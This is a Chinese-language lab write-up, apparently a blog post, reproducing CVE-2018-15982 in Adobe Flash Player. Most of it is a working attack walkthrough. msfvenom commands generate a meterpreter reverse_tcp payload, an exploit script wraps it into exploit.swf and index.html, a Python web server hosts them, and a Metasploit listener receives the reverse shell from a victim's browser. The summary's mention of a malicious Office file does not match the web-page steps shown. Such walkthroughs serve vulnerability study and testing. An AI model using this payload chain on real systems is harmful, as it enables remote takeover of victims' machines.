漏洞实验:CVE-2018-15982-Adobe Flash Player远程代码执行漏洞

漏洞简介

漏洞名称Adobe Flash Player远程代码执行漏洞
威胁类型远程代码执行
威胁等级
漏洞IDCVE-2018-15982
利用场景攻击者通过网页下载、电子邮件、即时通讯等渠道向受害者发送恶意构造的Office文件诱使其打开处理,可能触发漏洞在用户系统上执行任意指令获取控制。
受影响系统及应用版本Adobe Flash Player(31.0.0.153及更早的版本)
不受影响影响系统及应用版本Adobe Flash Player 32.0.0.101(修复后的最新版本)
修复及升级地址https://get.adobe.com/flashplayer/

生成msf后门

[email protected]:~# msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.177.148 -f raw >86.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes

[email protected]:~# msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.177.148 -f raw >64.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes

生成exploit

将msf生成的两个文件86.bin和64.bin放入脚本所在目录下,执行脚本,生成exploit

[email protected]:~/CVE-2018-15982_EXP-master# python CVE_2018_15982.py  -i 86.bin -I 64.bin

[*] Done ! output file --> exploit.swf
[*] Done ! output file --> index.html
[email protected]:~/CVE-2018-15982_EXP-master#

开启本地HTTP服务

利用python自带服务,在脚本当前目录开启HTTP服务

[email protected]:~/CVE-2018-15982_EXP-master# python -m SimpleHTTPServer 8080

开启MSF反弹监听

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf exploit(multi/handler) > set LHOST 192.168.177.148
LHOST => 192.168.177.148
msf exploit(multi/handler) > run

反弹shell

模拟受害者访问HTTP服务,触发漏洞,反弹shell


也许访问后IE会崩溃,未响应

但此时已经成功利用漏洞,反弹shell到msf上了

注意:当浏览器访问的标签页关闭了,反弹的shell也会断开连接
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值